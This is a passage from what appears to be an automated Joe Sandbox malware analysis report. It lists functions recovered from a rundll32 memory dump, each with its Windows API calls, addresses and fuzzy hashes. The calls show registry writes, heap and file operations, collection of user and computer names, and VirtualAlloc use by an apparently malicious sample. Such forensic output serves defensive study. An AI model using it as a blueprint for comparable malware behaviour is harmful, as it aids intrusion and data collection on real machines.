                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0628FC8A
                                                          • wsprintfA.USER32 ref: 0628FCC6
                                                          • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0628FCE5
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628FCFA
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628FD07
                                                          • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0628FD15
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                                          • String ID:
                                                          • API String ID: 168057987-0
                                                          • Opcode ID: 8e43b86c645f0101c39e01ce9d91d493a93afd3a050934b931e27c3111c68a71
                                                          • Instruction ID: 8a3200e037fb2e267f17c0dab4975badff3ac70684e5f307b6834df426ab0186
                                                          • Opcode Fuzzy Hash: 8e43b86c645f0101c39e01ce9d91d493a93afd3a050934b931e27c3111c68a71
                                                          • Instruction Fuzzy Hash: C631E031A11315AFC751BF65EC49E5BBBE9EF88310F00082AFE54E6191D7708818DFA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627F39B Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0627F3DB
                                                          • GetLastError.KERNEL32 ref: 0627F3E5
                                                          • WaitForSingleObject.KERNEL32(000000C8), ref: 0627F40A
                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0627F42D
                                                          • SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0627F455
                                                          • WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0627F46A
                                                          • SetEndOfFile.KERNEL32(00001000), ref: 0627F477
                                                          • GetLastError.KERNEL32 ref: 0627F483
                                                          • CloseHandle.KERNEL32(00001000), ref: 0627F48F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                                          • String ID:
                                                          • API String ID: 2864405449-0
                                                          • Opcode ID: 8a86aec5e537abd2daa72df11c5693891898421842ea5425fa324fd47a4eda6c
                                                          • Instruction ID: e2e5aea48e58c8ae7c30c7918515894aee7c6be06cd1d25914add5a740cef60f
                                                          • Opcode Fuzzy Hash: 8a86aec5e537abd2daa72df11c5693891898421842ea5425fa324fd47a4eda6c
                                                          • Instruction Fuzzy Hash: 64318C31A10209BFEB118FA9EE0DFAE7B79EF44328F204110FA10A2090C3704A54DFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0629068D Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,06275674,00000008,?,00000010,00000001,00000000,0000003A), ref: 062906AC
                                                          • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 062906E0
                                                          • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 062906E8
                                                          • GetLastError.KERNEL32 ref: 062906F2
                                                          • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0629070E
                                                          • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 06290727
                                                          • CancelIo.KERNEL32(?), ref: 0629073C
                                                          • CloseHandle.KERNEL32(?), ref: 0629074C
                                                          • GetLastError.KERNEL32 ref: 06290754
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                                          • String ID:
                                                          • API String ID: 4263211335-0
                                                          • Opcode ID: 42e942aa930ba18a1fee592c7b997760657a1199cb5cd095b2630c1a1ccd4df9
                                                          • Instruction ID: a697d18466c773a342a6cd08c52625c71926c1115f5a2ba25d467d41c07b2b37
                                                          • Opcode Fuzzy Hash: 42e942aa930ba18a1fee592c7b997760657a1199cb5cd095b2630c1a1ccd4df9
                                                          • Instruction Fuzzy Hash: FD212E75A10219BFDF429F65E8489EE7B7AEF88320B008016FA09E6140D7708555CFB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06281C19 Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0627E231,00000000,76CDF5B0,06280348,?,00000001), ref: 06281C25
                                                          • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 06281C3B
                                                          • _snwprintf.NTDLL ref: 06281C60
                                                          • CreateFileMappingW.KERNEL32(000000FF,0629A1E8,00000004,00000000,00001000,?), ref: 06281C7C
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 06281C8E
                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 06281CA5
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 06281CC6
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 06281CCE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: b7f8e2fdcf7ce962773b4a22432f4c7579949f61054897fb3b85ee08f7b1a503
                                                          • Instruction ID: 8a22d664b8698cbf6e35a0a5fc4e2fcd8ebe7f1945b4fee3c47ed5a6d72be5d2
                                                          • Opcode Fuzzy Hash: b7f8e2fdcf7ce962773b4a22432f4c7579949f61054897fb3b85ee08f7b1a503
                                                          • Instruction Fuzzy Hash: 0121C372B51305BFD761AB54EC09F9A77A9AB88750F200121FA05F72C1D6709516CBB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628CB5A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 191stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(00000000,?,06899A2B,?,?,06899A2B,?,?,06899A2B,?,?,06899A2B,?,00000000,00000000,00000000), ref: 0628CC58
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0628CC7B
                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 0628CC83
                                                          • lstrlenW.KERNEL32(00000000,?,06899A2B,?,?,06899A2B,?,?,06899A2B,?,?,06899A2B,?,?,06899A2B,?), ref: 0628CCCE
                                                          • memcpy.NTDLL(00000000,?,?,?), ref: 0628CD36
                                                          • LocalFree.KERNEL32(?,?), ref: 0628CD4F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                                          • String ID: P
                                                          • API String ID: 3649579052-3110715001
                                                          • Opcode ID: 4db5d4adc6573309f896d0ef2eef74368f2b256b583daaf87f4b0e3a473d6ba1
                                                          • Instruction ID: 323dac911d78b0e7f4d3f582a95323c6e1eaaae201bb54a2aaca8bf8de6ab4d6
                                                          • Opcode Fuzzy Hash: 4db5d4adc6573309f896d0ef2eef74368f2b256b583daaf87f4b0e3a473d6ba1
                                                          • Instruction Fuzzy Hash: A7616E71E1120AAFDF51FFA8DC88DAEBBB9EF89344B044425EA14A7290D7349945CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628C563 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148timestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0629148E: InterlockedIncrement.KERNEL32(00000018), ref: 062914DF
                                                            • Part of subcall function 0629148E: RtlLeaveCriticalSection.NTDLL(0689C398), ref: 0629156A
                                                          • OpenProcess.KERNEL32(00000410,B8F475FF,06282289,00000000,00000000,06282289,0000001C,00000000,00000000,?,?,?,06282289), ref: 0628C5BD
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,06282299,00000104,?,?,?,06282289), ref: 0628C5DB
                                                          • GetSystemTimeAsFileTime.KERNEL32(06282289), ref: 0628C643
                                                          • lstrlenW.KERNEL32(C78BC933), ref: 0628C6B8
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 0628C6D4
                                                          • memcpy.NTDLL(00000014,C78BC933,00000002), ref: 0628C6EC
                                                            • Part of subcall function 0627F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0627F384
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                                                          • String ID: o
                                                          • API String ID: 2541713525-252678980
                                                          • Opcode ID: 2346c133b6d0d5401def7101ad730b23c1576a8bae825af3822e26a383f28db6
                                                          • Instruction ID: 91a7ad4d191676d5232c5f1fd826087b9017f9f755a142e4432187a04026bc19
                                                          • Opcode Fuzzy Hash: 2346c133b6d0d5401def7101ad730b23c1576a8bae825af3822e26a383f28db6
                                                          • Instruction Fuzzy Hash: 8851BF71B21717AFDB51EF64DC88BAAB7A9FF48304F144529EA05D7280D770E980CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627A316 Relevance: 12.2, APIs: 8, Instructions: 209timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0627A391
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0627A3BD
                                                          • _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0627A3CD
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0627A405
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0627A427
                                                          • GetShellWindow.USER32 ref: 0627A436
                                                            • Part of subcall function 06282986: GetShellWindow.USER32 ref: 062829A4
                                                            • Part of subcall function 06282986: GetVersion.KERNEL32 ref: 06282A46
                                                            • Part of subcall function 06282986: GetVersion.KERNEL32 ref: 06282A54
                                                          • GetLastError.KERNEL32(?), ref: 0627A521
                                                          • CloseHandle.KERNEL32(?), ref: 0627A535
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: TimerWaitable$ShellVersionWindow$CloseCreateErrorHandleLastMultipleObjectsWait_allmul
                                                          • String ID:
                                                          • API String ID: 2436285880-0
                                                          • Opcode ID: 44b58c0f151412f96cb5637a5421cb0a9c12782a7e8034e6e326d2bd54adddb4
                                                          • Instruction ID: 2769f5a9b8b8821a91ab983449d7460b6b4c7eefc72bc30c61a5bf06c395f9f4
                                                          • Opcode Fuzzy Hash: 44b58c0f151412f96cb5637a5421cb0a9c12782a7e8034e6e326d2bd54adddb4
                                                          • Instruction Fuzzy Hash: 967147B1918306AFD750DF64D888C6FBBE9FB88364F004A2EF99597290D730D9458B62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06277A61 Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628B7A4: RegCreateKeyA.ADVAPI32(80000001,0689B7F0,?), ref: 0628B7B9
                                                            • Part of subcall function 0628B7A4: lstrlen.KERNEL32(0689B7F0,00000000,00000000,00000000,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C,00000008,00000003), ref: 0628B7E2
                                                          • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 06277AA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 06277ABE
                                                          • HeapFree.KERNEL32(00000000,?,?,062887CC,?,?), ref: 06277B20
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06277B34
                                                          • WaitForSingleObject.KERNEL32(00000000,?,062887CC,?,?), ref: 06277B86
                                                          • HeapFree.KERNEL32(00000000,?,?,062887CC,?,?), ref: 06277BAF
                                                          • HeapFree.KERNEL32(00000000,?,?,062887CC,?,?), ref: 06277BBF
                                                          • RegCloseKey.ADVAPI32(?,?,062887CC,?,?), ref: 06277BC8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                                          • String ID:
                                                          • API String ID: 3503961013-0
                                                          • Opcode ID: 570d8c3f4f28cdb5d190bd12ca995c47dab5523392dfb0fb846a3a2bc3ff8aa0
                                                          • Instruction ID: fb267f11fbd2f0a413c3caabab63bf1e0ca65a463c0a6b5a86cdd8410a9c059c
                                                          • Opcode Fuzzy Hash: 570d8c3f4f28cdb5d190bd12ca995c47dab5523392dfb0fb846a3a2bc3ff8aa0
                                                          • Instruction Fuzzy Hash: FF41D6B5D1020AEFDF419FA4DC88CEEBB7AFF48354F10546AEA15A2210D3355A94DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627AAAF Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0627A1A1), ref: 0627AAC5
                                                          • wsprintfA.USER32 ref: 0627AAED
                                                          • lstrlen.KERNEL32(?), ref: 0627AAFC
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          • wsprintfA.USER32 ref: 0627AB3C
                                                          • wsprintfA.USER32 ref: 0627AB71
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0627AB7E
                                                          • memcpy.NTDLL(00000008,062953E8,00000002,00000000,?,?), ref: 0627AB93
                                                          • wsprintfA.USER32 ref: 0627ABB6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                                          • String ID:
                                                          • API String ID: 2937943280-0
                                                          • Opcode ID: bc8c0848d49e26b90290b1f72446ad23b68e083285c1838e46047d3cb8b09649
                                                          • Instruction ID: 67e265b5dd5013989ed49c069105086079eef55adab4d08cbb61469d628d89f6
                                                          • Opcode Fuzzy Hash: bc8c0848d49e26b90290b1f72446ad23b68e083285c1838e46047d3cb8b09649
                                                          • Instruction Fuzzy Hash: 40413D71A1020AEFDB50DFA9D884EAEB7FDEF48318B144455E919E7211EB30EA05CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062916C6 Relevance: 12.1, APIs: 8, Instructions: 98memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 062916F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06291703
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 06291715
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,06286C8E), ref: 06291739
                                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 06291747
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0629175E
                                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 0629176F
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,06286C8E), ref: 06291795
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: bae6e46585d06fabc686de01151d418ab5d32965fc308a5530399b94dc8e74ba
                                                          • Instruction ID: ccd05438ec8a1f581559d349c9be547464a7a9bc446a70425ade63450a19808d
                                                          • Opcode Fuzzy Hash: bae6e46585d06fabc686de01151d418ab5d32965fc308a5530399b94dc8e74ba
                                                          • Instruction Fuzzy Hash: 8331E376A1020AEFDB00DFB5DD89DAEB7FAEB882447108469E905D7200E734DD55DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062863D1 Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?), ref: 062863F5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 06286407
                                                          • wcstombs.NTDLL ref: 06286415
                                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?), ref: 06286439
                                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0628644E
                                                          • mbstowcs.NTDLL ref: 0628645B
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?,?), ref: 0628646D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?,?), ref: 06286487
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                                          • String ID:
                                                          • API String ID: 316328430-0
                                                          • Opcode ID: 40d9c576972b4d90b328d280ce8ecd7f8f99a34e87fa9d9881ce3f3489fab8ab
                                                          • Instruction ID: efd0bd0bc581d0eaef4610e70e4399c6172ca7b678fc501e4307557bafbecb11
                                                          • Opcode Fuzzy Hash: 40d9c576972b4d90b328d280ce8ecd7f8f99a34e87fa9d9881ce3f3489fab8ab
                                                          • Instruction Fuzzy Hash: 35214F3190130AFFDF219FA5EC09E9E7BBAEB84314F104125BA04A10A0D7719964DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627D922 Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(0628E453,00000000,00000000,0629A440,?,?,0627F68B,0628E453,00000000,0628E453,0629A420), ref: 0627D935
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0627D943
                                                          • wsprintfA.USER32 ref: 0627D95F
                                                          • RegCreateKeyA.ADVAPI32(80000001,0629A420,00000000), ref: 0627D977
                                                          • lstrlen.KERNEL32(?), ref: 0627D986
                                                          • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 0627D994
                                                          • RegCloseKey.ADVAPI32(?), ref: 0627D99F
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627D9AE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1575615994-0
                                                          • Opcode ID: 9d409cd1f83fa5bdf1279feb1c7158f0a530095acd305356ddaaf1d176f712ed
                                                          • Instruction ID: 8e12e969122bbca2204a2a6142feddaa06daf218b69482f4c1066bec11bf8cf3
                                                          • Opcode Fuzzy Hash: 9d409cd1f83fa5bdf1279feb1c7158f0a530095acd305356ddaaf1d176f712ed
                                                          • Instruction Fuzzy Hash: 77113932600208BFEB029B98FC8DEAA3B7AEB89714F144025FB0496150E6729D54DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628FE06 Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0628FE12
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0628FE30
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0628FE38
                                                          • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0628FE56
                                                          • GetLastError.KERNEL32 ref: 0628FE6A
                                                          • RegCloseKey.ADVAPI32(?), ref: 0628FE75
                                                          • CloseHandle.KERNEL32(00000000), ref: 0628FE7C
                                                          • GetLastError.KERNEL32 ref: 0628FE84
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                                          • String ID:
                                                          • API String ID: 3822162776-0
                                                          • Opcode ID: 9c899bf5e5c63cce7c5d8c1ca576765ccb27c0abc19fb44f6880b6d3a6161b46
                                                          • Instruction ID: a08f88432f8c86e54ae38021975b1ba7f97c7fff3bae3af94449c686d3873309
                                                          • Opcode Fuzzy Hash: 9c899bf5e5c63cce7c5d8c1ca576765ccb27c0abc19fb44f6880b6d3a6161b46
                                                          • Instruction Fuzzy Hash: 47115E76210309AFEB426FA5EC5CAAA3B6AEF883A1F144014FF05D6281DB71C955CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627941B Relevance: 11.5, APIs: 9, Instructions: 298COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 62b2203faceba28fee21d4099ad645b2be6c5a687b0f5aac9ff227f0e9ab7363
                                                          • Instruction ID: ec5bea8bb0f4958eb2cd02c3cf5deef73097d6267f3df7695ec1c5fe0536589a
                                                          • Opcode Fuzzy Hash: 62b2203faceba28fee21d4099ad645b2be6c5a687b0f5aac9ff227f0e9ab7363
                                                          • Instruction Fuzzy Hash: BDB11271C2022AEFDFA1DBA8DC48AEEBBB5EF05315F044065E910B6160D7359A85CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062923FD Relevance: 11.5, APIs: 9, Instructions: 296COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.NTDLL(?,?,0000000D,?,?,00000000,?,?,?,?,?,?,?,?,06292801,?), ref: 0629242E
                                                          • memcpy.NTDLL(?,?,0000000D,?,?,0000000D,?,?,00000000), ref: 0629243B
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memcpy.NTDLL(00000000,?,?,00000008,?,00000001,06292801,00000000,00000001,?,?,?,?,06292801,?,00000000), ref: 062925C9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 4068229299-0
                                                          • Opcode ID: 5e3c159f23496f2f5a9ddace7ecb7e8a455c017ec6727d6a1fd3f65a8b044426
                                                          • Instruction ID: 879547d239944d6504918542b0f3c91009790848e716075f271369f81dc1699b
                                                          • Opcode Fuzzy Hash: 5e3c159f23496f2f5a9ddace7ecb7e8a455c017ec6727d6a1fd3f65a8b044426
                                                          • Instruction Fuzzy Hash: 36B11671A3120AFBDF91DE94DD80EEE77A9AF84200F048125ED14AB250EB30DB15CBB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627BA6B Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCommandLineA.KERNEL32(062960F0,00000038,0627E22A,00000000,76CDF5B0,06280348,?,00000001,?,?,?,?,?,?,?,06279100), ref: 0627BA7C
                                                          • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 0627BA8D
                                                            • Part of subcall function 0627D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0627DA7B,?), ref: 0627D4E3
                                                            • Part of subcall function 0627D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0627D506
                                                            • Part of subcall function 0627D4DA: memset.NTDLL ref: 0627D515
                                                          • ExitProcess.KERNEL32 ref: 0627BC6F
                                                            • Part of subcall function 0627A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,0689C304,00000000,?,06276584,?), ref: 0627A90E
                                                            • Part of subcall function 0627A8E9: StrTrimA.SHLWAPI(00000020,06295FCC,00000000,?,06276584,?), ref: 0627A92D
                                                            • Part of subcall function 0627A8E9: StrChrA.SHLWAPI(00000020,?,?,06276584,?), ref: 0627A939
                                                          • lstrcmp.KERNEL32(?,?), ref: 0627BAFB
                                                          • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,06279100,?), ref: 0627BB13
                                                            • Part of subcall function 06274BC4: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0689B7F0,?,?,0628B7F2,0000003A,0689B7F0,?,0628A2EB,00000001,?,00000000,00000000), ref: 06274C04
                                                            • Part of subcall function 06274BC4: CloseHandle.KERNEL32(000000FF,?,?,0628B7F2,0000003A,0689B7F0,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C), ref: 06274C0F
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,06279100,?), ref: 0627BB85
                                                          • lstrcmp.KERNEL32(?,?), ref: 0627BB9E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 739714153-0
                                                          • Opcode ID: 6ca47a7aa36300f07097b7a8039d94202017c4bee489b6ec305d35ae2e5b7c1b
